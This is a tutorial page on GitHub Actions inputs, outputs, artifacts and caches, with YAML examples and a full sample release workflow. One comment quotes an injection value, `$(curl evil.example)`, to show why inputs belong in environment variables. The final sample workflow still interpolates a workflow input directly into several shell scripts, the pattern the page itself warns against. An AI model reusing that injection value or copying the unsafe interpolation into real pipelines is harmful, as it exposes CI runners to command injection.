GitHub Actions General · Created: 10 Apr 2026 · Updated: 10 Apr 2026

Inputs, Outputs, Artifacts, and Caches

Real pipelines are built from multiple jobs that must cooperate: one job builds the code, another tests it, a third deploys it. To make this work, jobs need ways to pass simple values to each other, share files produced during a run, and avoid repeating expensive work on every execution. GitHub Actions addresses all three needs through inputs and outputs, artifacts, and caches.

Working with Inputs and Outputs

Within a workflow you often need to pass configuration in from the outside, or forward a value computed in one step to a later step or job. GitHub Actions provides specific syntax for each direction of data flow.

Defining and Referencing Workflow Inputs

Workflow inputs are explicit values that a user or another workflow supplies at trigger time. They are not the same as context values or default environment variables — they must be declared in advance under a trigger's inputs: block.

Two triggers support inputs:

workflow_dispatch

Lets a developer start the workflow manually from the Actions tab and fill in values through a form. Useful for release workflows where a human must supply a version number or choose a deployment target.

workflow_call

Allows another workflow to invoke this one as a reusable sub-workflow and pass inputs programmatically. Covered in depth in the Reusable Workflows topic.

Regardless of which trigger fires, the inputs are accessed identically inside the workflow with ${{ inputs.<input-name> }}.

on:
  workflow_dispatch:
    inputs:
      service_name:
        description: 'Name of the microservice to deploy'
        required: true
        default: 'order-service'
      deploy_region:
        description: 'Cloud region for deployment'
        required: true
        default: 'eu-west-1'

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Deploy service
        run: |
          echo "Deploying ${{ inputs.service_name }} to ${{ inputs.deploy_region }}"

A developer opening the Actions tab and choosing to run this workflow will see a form with the two fields pre-filled with the default values. They can override either before clicking Run.

Always be careful with inputs that could be manipulated. Avoid interpolating ${{ inputs.* }} directly inside run: shell scripts, as a crafted value could inject shell commands. Assign the input to an environment variable first and reference the env variable inside the script.
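
In practice the safe pattern looks like this (a minimal sketch; the job name is illustrative, the input comes from the example above):

```yaml
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - name: Deploy service safely
        env:
          # The shell receives SERVICE_NAME as plain data, so a crafted value
          # like `$(curl evil.example)` is printed literally, not executed.
          SERVICE_NAME: ${{ inputs.service_name }}
        run: |
          echo "Deploying $SERVICE_NAME"
```

The difference is subtle but important: `${{ }}` expressions are substituted into the script text before the shell runs, while environment variables are expanded by the shell itself and are never re-parsed as commands.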

Capturing Output from a Step

A step can share a value with later steps in the same job by writing to the special file referenced by the $GITHUB_OUTPUT environment variable. The format is name=value appended to that file.

The step must have an id: field so the output can be addressed by name. Other steps in the same job then read it through ${{ steps.<step-id>.outputs.<name> }}.

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Compute build number
        id: gen-build-num
        run: |
          BUILD_NUM="build-$(date +%Y%m%d)-${{ github.run_number }}"
          echo "BUILD_NUM=$BUILD_NUM" >> $GITHUB_OUTPUT

      - name: Use build number in next step
        run: |
          echo "Tagging image with ${{ steps.gen-build-num.outputs.BUILD_NUM }}"

The first step writes BUILD_NUM to $GITHUB_OUTPUT. The second step reads it back through the steps context using the id gen-build-num.

GitHub Actions previously used a set-output workflow command (::set-output name=…::) to capture step outputs. That mechanism was deprecated because it was vulnerable to injection attacks. Always use $GITHUB_OUTPUT instead.
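
One related detail: a value containing newlines cannot be written as a single `name=value` line. GitHub's documented alternative is a heredoc-style delimiter written to the same file. A minimal sketch (the step and output names are illustrative):

```yaml
- name: Capture recent commits as a multiline output
  id: changelog
  run: |
    # Everything between "NOTES<<EOF" and the closing "EOF" line becomes
    # the value of the NOTES output, newlines included.
    {
      echo "NOTES<<EOF"
      git log --oneline -n 3
      echo "EOF"
    } >> "$GITHUB_OUTPUT"
```

Later steps then read it as `${{ steps.changelog.outputs.NOTES }}`, exactly like a single-line output.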

Capturing Output from a Job

To make a value produced in one job available to a different job, you must do two things:

  1. Add an outputs: block to the producing job that maps a key name to a step output expression.
  2. In the consuming job, declare a dependency with needs: and then reference the value through ${{ needs.<job-id>.outputs.<key> }}.

jobs:
  prepare:
    runs-on: ubuntu-latest
    outputs:
      # Expose the step output as a job-level output under the key "config-path"
      config-path: ${{ steps.locate-config.outputs.CONFIG_FILE }}
    steps:
      - name: Locate configuration file
        id: locate-config
        run: |
          CONFIG_FILE="config/production.yaml"
          echo "CONFIG_FILE=$CONFIG_FILE" >> $GITHUB_OUTPUT

  validate:
    runs-on: ubuntu-latest
    needs: prepare # ensures prepare finishes before validate starts
    steps:
      - name: Validate config
        run: |
          echo "Validating ${{ needs.prepare.outputs.config-path }}"

The needs: keyword does double duty: it establishes execution order (validate runs only after prepare succeeds) and it gives the validate job access to prepare's outputs through the needs context.

When the output path expression becomes long and repetitive across multiple steps, it is cleaner to map it to a local environment variable:

validate:
  runs-on: ubuntu-latest
  needs: prepare
  steps:
    - name: Validate config
      env:
        CONFIG_PATH: ${{ needs.prepare.outputs.config-path }}
      run: echo "Validating $CONFIG_PATH"

Capturing Output from an Action Used in a Step

When a step uses a third-party or community action (via uses:), that action may declare its own outputs in its action.yml metadata file. You capture those outputs in exactly the same way as step outputs — by giving the step an id: and reading through steps.<id>.outputs.<name>.

jobs:
  version:
    runs-on: ubuntu-latest
    outputs:
      next-tag: ${{ steps.semver.outputs.next_tag }}
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0 # full history is required for semver detection

      - name: Detect next semantic version
        id: semver
        uses: mathieudutour/github-tag-action@v6.1

      - name: Print detected version
        run: echo "Next release will be ${{ steps.semver.outputs.next_tag }}"

The github-tag-action action exposes an output named next_tag. Because the step has id: semver, it is readable as steps.semver.outputs.next_tag — no extra configuration needed.

Artifacts

Artifacts, as Actions defines them, are files or collections of files created as the result of a job or workflow run and then persisted in GitHub. The most common reason to persist an artifact is so that it can be shared with other jobs in the same workflow — for example, a compiled module that needs to be tested or packaged by a downstream job. You can also access artifacts after the run has finished, either through the Actions UI or via the REST API.

Common uses for artifacts include:

  1. Compiled binaries or distribution packages produced by a build job
  2. Test result XML files and coverage reports
  3. Log files or diagnostic dumps collected when a job fails
  4. Static site output ready for deployment

Artifacts cannot be kept forever. By default, GitHub retains artifacts and build logs for 90 days before automatically deleting them.

Artifact Retention Policy

If you have the necessary permissions on the repository, you can change the default retention period in the repository's Settings → Actions → General page, under the Artifact and log retention section.

| Repository type | Configurable range |
| --------------- | ------------------ |
| Public          | 1 – 90 days        |
| Private         | 1 – 400 days       |

This repository-level setting only applies to new artifacts and log files created after the change — existing artifacts are not retroactively affected. Organizations and enterprises can also enforce maximum retention limits at their level, which individual repositories cannot override.

You can also override the retention period for a specific artifact at upload time using the retention-days parameter (described below). This is useful when a pipeline artifact is only needed for the duration of the workflow run and storing it longer would waste storage quota.

GitHub includes a certain amount of artifact storage at no cost depending on your plan. Storage costs accumulate over the full time the artifacts are retained — unlike compute minutes, which are charged only while jobs run. Keeping retention periods as short as practical helps manage storage spend.

Artifacts vs. GitHub Packages

GitHub has a separate product called GitHub Packages that should not be confused with workflow artifacts. GitHub Packages is a package registry that hosts versioned, publishable packages for:

  1. Container images
  2. RubyGems
  3. npm packages
  4. Maven and Gradle packages
  5. NuGet packages

The key practical differences are: artifacts are tied to a specific workflow run and expire automatically, while packages are versioned releases intended for long-term distribution. GitHub also charges for data transfer with Packages, whereas artifact downloads within Actions are not charged for transfer.

Uploading Artifacts

Use the actions/upload-artifact action to persist files from the current runner. The action accepts the parameters listed in the table below.

| Parameter | Required | Default | Description |
| --------- | -------- | ------- | ----------- |
| name | No | artifact | Identifier for the artifact. Used when downloading it in another job or from the UI. |
| path | Yes | — | File system path to upload. Can be a single file, a directory, or a glob pattern. |
| if-no-files-found | No | warn | What to do when the path matches nothing: error — fail the step; warn — log a warning but continue; ignore — do nothing silently. |
| retention-days | No | Repository default | Number of days before this artifact expires. Must be between 1 and the repository's configured maximum (90 for public, up to 400 for private). |

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Compile Go binary
        run: |
          mkdir -p bin
          # go build -o bin/server ./cmd/server # real command in a Go project
          echo "server-binary-placeholder" > bin/server

      - name: Upload compiled binary
        uses: actions/upload-artifact@v4
        with:
          name: server-binary
          path: bin/
          # error causes the step to fail if bin/ is empty, catching build problems early.
          if-no-files-found: error
          # 30 days is enough time for the release review window; saves storage quota.
          retention-days: 30

The path can be a single file, a directory, or a glob pattern. Multiple files that match a glob are bundled into a single zip archive under the given name.
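
As a sketch of the glob form (the report paths assume a Maven surefire layout and are illustrative):

```yaml
- name: Upload all test reports
  uses: actions/upload-artifact@v4
  with:
    name: junit-reports
    # The glob matches every XML report under any surefire-reports directory;
    # all matches are bundled into one archive named "junit-reports".
    path: '**/target/surefire-reports/*.xml'
    # warn rather than error: a module with no tests should not fail the upload.
    if-no-files-found: warn
```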

Downloading Artifacts

Each job runs in its own freshly provisioned runner. Files created in one job are not automatically visible to another — the runner is discarded when the job ends. To use an artifact in a downstream job, you must explicitly download it with actions/download-artifact, specifying the same name used during upload.

integration-test:
  runs-on: ubuntu-latest
  needs: build
  steps:
    - name: Download compiled binary
      uses: actions/download-artifact@v4
      with:
        name: server-binary
        path: bin/

    - name: Verify binary exists and run tests
      run: |
        ls bin/
        echo "Running integration tests against downloaded binary"

The downloaded files are placed in the directory specified by path. If path is omitted, a single named artifact is extracted into the current working directory; when all artifacts are downloaded at once, each lands in a subdirectory named after the artifact.
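
Omitting name entirely makes actions/download-artifact@v4 fetch every artifact from the run, which is handy in a final reporting or release job. A minimal sketch:

```yaml
- name: Download every artifact from this run
  uses: actions/download-artifact@v4
  with:
    # No "name" given: all artifacts are fetched, each extracted into
    # its own subdirectory under all-artifacts/.
    path: all-artifacts/
```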

Artifact Size Limits

| Limit | Value |
| ----- | ----- |
| Maximum size per artifact | 10 GB (compressed) |
| Included storage | Depends on GitHub plan; excess billed per GB per month |

Using Caches

Artifacts persist the outputs of a job. Caches persist the inputs — typically dependency packages or build tool downloads — so they do not need to be re-fetched on every run. The difference matters:


|                     | Artifact                          | Cache                                           |
| ------------------- | --------------------------------- | ----------------------------------------------- |
| What it stores      | Build outputs (binaries, reports) | Reusable inputs (dependencies, downloaded tools) |
| Shared between runs | No (per-run)                      | Yes (across many runs)                          |
| Invalidated when    | Retention period expires          | Cache key changes                               |

Using the Cache Action Explicitly

The actions/cache action saves a directory to the cache and restores it on the next run. A key controls when the cache is considered valid. A common pattern is to include a hash of the dependency lock file in the key so that the cache is automatically invalidated whenever dependencies change.

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Restore Maven local repository
        uses: actions/cache@v4
        with:
          path: ~/.m2/repository
          # The key includes a hash of pom.xml so the cache is refreshed whenever
          # dependencies change. If the key matches, the cache is restored instantly.
          key: maven-${{ runner.os }}-${{ hashFiles('**/pom.xml') }}
          # restore-keys provides a fallback: if no exact key matches, the most recent
          # cache with this prefix is used instead of starting from scratch.
          restore-keys: |
            maven-${{ runner.os }}-

      - name: Build with Maven
        run: |
          echo "mvn package -B would run here"

Built-in Caching via Setup Actions

Many language setup actions — such as actions/setup-node, actions/setup-python, and actions/setup-java — have caching built in. Enabling it is a single line:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Set up Node.js with npm cache
        uses: actions/setup-node@v4
        with:
          node-version: '20'
          # cache: 'npm' tells setup-node to cache ~/.npm automatically.
          # The cache key is derived from package-lock.json — no extra configuration needed.
          cache: 'npm'

      - name: Install dependencies
        run: npm ci

Built-in caching is the simplest option when a setup action supports it, as it handles key generation and cache paths automatically.

Cache Key Design

A well-designed cache key balances two goals: reuse the cache as often as possible, and invalidate it whenever the cached content would be stale. Common key components include:

  1. ${{ runner.os }} — separates caches for Linux, macOS, and Windows runners
  2. ${{ hashFiles('**/package-lock.json') }} — changes whenever the lock file changes
  3. A fixed prefix string that identifies the language or tool being cached

The restore-keys: list provides ordered fallbacks. If no exact key matches, GitHub will restore the most recent cache whose key starts with any entry in restore-keys. This gives partial hits — you get most packages from the cache, then only download the delta.
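
The ordered-fallback behaviour can be sketched like this (an illustrative npm cache; the key prefixes are assumptions, not a prescribed naming scheme):

```yaml
- name: Restore npm cache with layered fallbacks
  uses: actions/cache@v4
  with:
    path: ~/.npm
    key: npm-${{ runner.os }}-${{ hashFiles('**/package-lock.json') }}
    # Fallbacks are tried top to bottom: first the most recent cache from the
    # same OS, then any npm cache at all. A partial hit still saves most downloads.
    restore-keys: |
      npm-${{ runner.os }}-
      npm-
```

On a partial hit the restored directory is simply stale, so the subsequent install step downloads only the packages that changed, then a fresh cache is saved under the new exact key.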

Key Takeaways

  1. Workflow inputs are declared under a trigger's inputs: block and accessed with ${{ inputs.<name> }}.
  2. Capture a step's output by writing NAME=value to $GITHUB_OUTPUT and assigning the step an id:.
  3. Expose step outputs to other jobs via the job's outputs: block; consume them with ${{ needs.<job>.outputs.<key> }}.
  4. Actions that declare outputs in their action.yml are accessed the same way as step outputs via the step's id:.
  5. Artifacts persist files (binaries, reports) beyond a job's lifetime using actions/upload-artifact and actions/download-artifact.
  6. Caches persist reusable inputs (dependencies) across runs using actions/cache or the built-in cache: option in setup actions.
  7. Design cache keys to include a hash of lock files so the cache is automatically invalidated when dependencies change.

Complete Working Example

The following is a complete, runnable GitHub Actions workflow that demonstrates every concept covered in this topic. Each significant line includes a comment explaining why it is written that way.

# This workflow demonstrates a Python library release pipeline.
# It covers: workflow_dispatch inputs, step outputs via GITHUB_OUTPUT,
# job outputs, artifact upload/download, and dependency caching.

name: Inputs, Outputs, Artifacts and Caches

# workflow_dispatch lets a developer trigger this workflow manually from the
# Actions tab and supply the release version and target environment at run time.
# Without inputs the version would have to be hard-coded in the YAML.
on:
  workflow_dispatch:
    inputs:
      release_version:
        description: 'Semantic version to stamp on the release (e.g. 1.4.0)'
        required: true
        default: '0.0.1'
      target_env:
        description: 'Deployment target: staging or production'
        required: true
        default: 'staging'

jobs:

  # ---------------------------------------------------------------
  # Job 1: build — compile the library and capture the version stamp
  # ---------------------------------------------------------------
  build:
    runs-on: ubuntu-latest

    # Declare the outputs this job will expose to downstream jobs.
    # The value is pulled from the step output written to GITHUB_OUTPUT below.
    outputs:
      stamped-version: ${{ steps.stamp.outputs.VERSION }}

    steps:

      - name: Check out source code
        uses: actions/checkout@v4
        # Checkout is required so the runner has the library source to build.

      - name: Set up Python
        uses: actions/setup-python@v5
        with:
          python-version: '3.12'
          # cache: 'pip' enables built-in pip caching inside setup-python.
          # This avoids re-downloading packages on every run, cutting minutes off cold starts.
          cache: 'pip'

      - name: Install build dependencies
        run: |
          # Install only the tools needed to build — not test extras — so the
          # build image stays small and the layer can be cached effectively.
          pip install build wheel

      - name: Stamp version from workflow input
        # Give this step an id so its outputs are addressable by other steps and jobs.
        id: stamp
        run: |
          # Write the caller-supplied version into GITHUB_OUTPUT so downstream jobs
          # can read it without re-parsing files or repeating logic.
          echo "VERSION=${{ inputs.release_version }}" >> $GITHUB_OUTPUT
          echo "Stamped version: ${{ inputs.release_version }}"

      - name: Build distribution packages
        run: |
          # python -m build produces dist/*.whl and dist/*.tar.gz.
          # We simulate the output here; a real pipeline would call the real build tool.
          mkdir -p dist
          echo "mylib-${{ inputs.release_version }}-py3-none-any.whl" > dist/package.whl
          echo "mylib-${{ inputs.release_version }}.tar.gz" > dist/package.tar.gz

      - name: Upload build artifacts
        uses: actions/upload-artifact@v4
        with:
          # A descriptive name makes artifacts easy to identify in the Actions UI.
          # Embedding the version in the name prevents collisions across concurrent runs.
          name: dist-packages-${{ inputs.release_version }}
          path: dist/
          # Keeping artifacts for 7 days balances storage cost against the time teams
          # need to investigate or roll back a release.
          retention-days: 7

  # ---------------------------------------------------------------
  # Job 2: test — run the test suite and publish a coverage report
  # ---------------------------------------------------------------
  test:
    runs-on: ubuntu-latest
    needs: build # must wait for build so the stamped version is available

    steps:

      - name: Check out source code
        uses: actions/checkout@v4

      - name: Set up Python with pip cache
        uses: actions/setup-python@v5
        with:
          python-version: '3.12'
          # Caching pip here avoids downloading pytest and coverage again.
          # The cache key is derived from requirements files automatically.
          cache: 'pip'

      - name: Install test dependencies
        run: pip install pytest pytest-cov

      - name: Download build artifacts
        uses: actions/download-artifact@v4
        with:
          # Reference the same artifact name used in the build job.
          # The downloaded files land in the ./dist directory set by path below.
          name: dist-packages-${{ inputs.release_version }}
          path: dist/

      - name: Confirm artifact is present
        run: |
          # Verifying the artifact arrived before running tests prevents a confusing
          # failure message deep inside the test runner if the file is missing.
          echo "Artifacts in dist/:"
          ls dist/

      - name: Run tests and collect coverage
        run: |
          # pytest --cov writes a coverage.xml report alongside the test results.
          # We create a placeholder here; a real project would run the actual suite.
          mkdir -p reports
          echo "<coverage version='${{ needs.build.outputs.stamped-version }}'></coverage>" \
            > reports/coverage.xml
          echo "Tests passed for version ${{ needs.build.outputs.stamped-version }}"

      - name: Upload coverage report
        uses: actions/upload-artifact@v4
        with:
          # Uploading coverage lets code-quality tools and reviewers inspect it
          # in the Actions UI without needing to re-run the pipeline locally.
          name: coverage-report-${{ inputs.release_version }}
          path: reports/coverage.xml
          retention-days: 14

  # ---------------------------------------------------------------
  # Job 3: release — tag and summarise the completed release
  # ---------------------------------------------------------------
  release:
    runs-on: ubuntu-latest
    needs: [build, test] # both jobs must succeed before releasing

    steps:

      - name: Download dist packages for release
        uses: actions/download-artifact@v4
        with:
          name: dist-packages-${{ inputs.release_version }}
          path: release/

      - name: Announce release details
        env:
          # Pulling the job output into an env variable makes the run: script cleaner
          # and avoids repeating the full needs.build.outputs.stamped-version expression.
          RELEASE_VERSION: ${{ needs.build.outputs.stamped-version }}
          TARGET_ENV: ${{ inputs.target_env }}
        run: |
          echo "============================================"
          echo " Release summary"
          echo "============================================"
          echo " Version     : $RELEASE_VERSION"
          echo " Environment : $TARGET_ENV"
          echo " Packages    :"
          ls release/
          echo "============================================"
          echo " Deployment to $TARGET_ENV would proceed here."
Next topic: Reusable Workflows
